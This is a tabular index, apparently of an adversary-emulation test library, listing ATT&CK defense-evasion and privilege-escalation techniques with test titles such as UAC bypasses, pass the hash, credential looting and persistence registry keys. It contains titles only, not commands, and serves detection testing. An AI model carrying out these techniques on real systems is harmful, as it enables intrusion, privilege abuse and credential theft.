400 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
401 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
402 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
403 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
404 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
405 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
406 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
407 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
408 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
409 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
410 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
411 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
412 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
413 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
414 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
415 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
416 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
417 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
418 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
419 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
420 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
421 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
422 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
423 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
424 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
425 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
426 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
427 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
428 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
429 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
430 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
431 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
432 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
433 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
434 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
435 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
436 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
437 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
438 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
439 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
440 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
441 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
442 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
443 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
444 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
445 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
446 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
447 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
448 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
449 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
450 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
451 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
452 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
453 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
454 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
455 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
456 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
457 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
458 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
459 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
460 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
461 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
462 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
463 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
464 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
465 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
466 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
467 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
468 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
469 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
470 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
471 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
472 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
473 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
474 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
475 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
476 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
477 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
478 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
479 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
480 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
481 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
482 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
483 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
484 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
485 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
486 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
487 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
488 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
489 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
490 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
491 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
492 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
493 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
494 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
495 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
496 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
497 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
498 privilege-escalation T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
499 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
500 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
501 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
502 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
503 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
504 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
505 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
506 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
507 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
508 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
509 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
510 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
511 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
512 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
513 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
514 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
515 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
516 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
517 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
518 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
519 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
520 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
521 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
522 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
523 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
524 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
525 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
526 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
527 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
528 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
529 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
530 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
531 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
532 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
533 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
534 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
535 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
536 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
537 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
538 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
539 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
540 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
541 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
542 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
543 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
544 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
545 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
546 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
547 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
548 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
549 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
550 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
551 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
552 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
553 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
554 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
555 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
556 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
557 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
558 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
559 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
560 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
561 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
562 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
563 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
564 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
565 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
566 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
567 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
568 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
569 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
570 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
571 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
572 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
573 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
574 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
575 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
576 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
